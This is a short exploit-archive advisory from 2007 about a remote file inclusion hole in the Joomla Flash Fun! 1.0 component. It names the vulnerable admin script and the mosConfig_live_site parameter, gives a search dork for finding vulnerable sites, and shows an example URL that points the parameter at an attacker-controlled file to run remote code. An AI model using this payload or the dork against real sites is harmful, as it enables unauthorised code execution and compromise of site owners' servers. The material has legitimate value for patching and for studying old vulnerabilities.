Joomla Component Flash Fun! 1.0 Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Joomla Component Flash Fun! 1.0 Remote File Inclusion Vulnerability
# Published : 2007-09-15
# Author : Morgan
# Previous Title : KwsPHP 1.0 stats Module Remote SQL Injection Exploit
# Next Title : Ajax File Browser 3b (settings.inc.php approot) RFI Vulnerability

######################################
# Joomla Flash Fun! Component RFI    #
######################################

Bug in :
/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=
Variable : $mosConfig_live_site

Dork: "com_joomlaflashfun"

Example:

http://xxx.net/2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=[attacker]


Greets to all Irc.RealWorm.Net #Morgan Users ;)

# www.Syue.com [2007-09-15]